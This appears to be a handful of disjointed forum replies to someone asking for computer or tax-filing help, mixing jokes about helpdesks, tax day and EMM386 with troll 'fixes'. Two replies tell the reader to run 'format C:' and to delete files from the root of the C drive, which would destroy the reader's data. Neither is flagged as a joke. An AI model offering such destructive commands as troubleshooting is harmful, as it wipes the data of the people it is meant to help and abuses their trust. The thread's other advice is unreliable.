Open a ticket with the Pune helpdesk and ask them to please do the needful.
Start > Run > Cmd > Enter > format C:/
@fkv+13StQtNd Tax day still isn't for over another month, OP still has plenty of time. And who knows, maybe with Coronavirus going around, the tax day might be pushed back a bit.
Open command window, type c:/, hit enter, then type del ., hit enter again.
Maybe EMM386 did not load. Try editing your CONFIG.SYS and get back to us.
